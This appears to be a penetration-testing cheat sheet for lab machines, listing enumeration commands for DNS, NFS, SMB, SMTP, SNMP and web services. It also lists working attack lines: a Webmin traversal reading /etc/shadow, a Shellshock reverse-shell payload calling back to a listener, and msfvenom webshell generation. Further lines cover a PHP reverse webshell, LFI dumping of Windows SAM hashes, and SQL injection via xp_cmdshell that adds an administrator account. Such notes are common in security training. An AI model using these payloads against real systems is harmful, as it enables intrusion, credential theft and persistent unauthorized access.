Enumeration and Gaining Access
#DNS Zone Transfers
//Windows DNS zone transfer
nslookup -> set type=any -> ls -d blah.com
//Linux DNS zone transfer
dig axfr blah.com @ns1.blah.com
host -t ns megacorpone.com
host -l megacorpone.com ns2.megacorpone.com
#DNS Tools
//Dnsrecon DNS Brute Force
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
//Dnsrecon DNS List of megacorp
dnsrecon -d megacorpone.com -t axfr
dnsrecon -d megacorpone.com
dnsrecon -r 192.168.13.200-192.168.13.254 -n 192.168.13.220 //reverse lookup; -n specifies the DNS server
dnsrecon -d acme.local -D /usr/share/wordlist/dns/dnsrecon.txt -t brt //brute-force the acme.local domain for hosts and subdomains
dnsrecon -a -d thinc.local -n 192.168.13.220 ## attempt a zone transfer; -n is the DNS server
#NFS (Network File System) Enumeration
//Show Mountable NFS Shares
nmap -sV --script=nfs-* $ip
nmap -sV --script=nfs-showmount $ip
//Enumerate NFS shares
showmount -e 192.168.56.103
//Mount NFS share
mount -t nfs 192.168.1.72:/home/vulnix /tmp/mnt -nolock
#SMB Enumeration
//SMB Enumeration Tools
nmblookup -A $ip
smbclient //MOUNT/share -I $ip -N
rpcclient -U "" $ip
enum4linux -a $ip
//Accessing Share folder
smbclient \\\\10.11.1.31\\wwwroot -u "" -p
smbclient //10.11.1.136/Bob\ Share
#SMTP Enumeration - Mail Servers
//Verify SMTP port using Netcat
nc -nv $ip 25
//Enumerating usernames through VRFY
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.22
#SNMP Enumeration
//SNMP Dictionary attack
root@kali:~# echo public > community
root@kali:~# echo private >> community
root@kali:~# echo manager >> community
root@kali:~# for ip in $(seq 1 254);do echo 10.11.1.$ip;done > ips
root@kali:~# onesixtyone -c community -i ips
#Webmin
//Test to see if webmin is running as root by grabbing /etc/shadow
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
#Shellshock
curl -H "User-Agent: () {:;}; /bin/bash -c 'bash -I >& /dev/tcp/10.11.0.169/1337 0>&1'" http://10.11.1.111/cgi-bin/admin.cgi -s
#Webdav with IIS6.0 Bypassing
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali machine> LPORT=8443 -f asp > reverse.asp
cadaver 10.12.23.11
dav:/> put reverse.asp reverse.txt
dav:/> copy reverse.txt reverse.asp;.txt
Now reverse.asp is located on the web server
Churrasco exploitation (https://www.exploit-db.com/exploits/6705/) for Win2k3 + IIS 6.0 could be used for privilege escalation
#LFI to SAM/SYSTEM files
=../../../../../../WINDOWS/repair/sam
=../../../../../../WINDOWS/repair/system
samdump2 SYSTEM SAM > hashes.txt
#OS-Shell via SQLMap
sqlmap -r req.txt -p type_id --os-shell
#SYSTEM Shell via MSSQL Payload (requires MSSQL SA credentials)
msf> use exploit/windows/mssql/mssql_payload
#Webshell
Kali: cd /usr/share/webshells/
PHP Shell <?php echo passthru("bash -I >& /dev/tcp/10.11.0.169/8443 0>&1");?>
JSP Shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.169 LPORT=443 -f raw > shell.jsp
Tomcat msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
#HTTP Enumeration
//Search for folders with gobuster:
gobuster -w /usr/share/seclists/Discovery/Web_Content/big.txt -u $ip -t 100
//Nikto
nikto -h $ip
For unauthenticated
curl -d "id=1';exec+master..xp_cmdshell+'net+user+eviladmin+P@ssw0rd+/add'--" http://10.11.1.100/news.asp
curl -d "id=1';exec+master..xp_cmdshell+'net+localgroup+administrators+eviladmin+/add'--" http://10.11.1.100/news.asp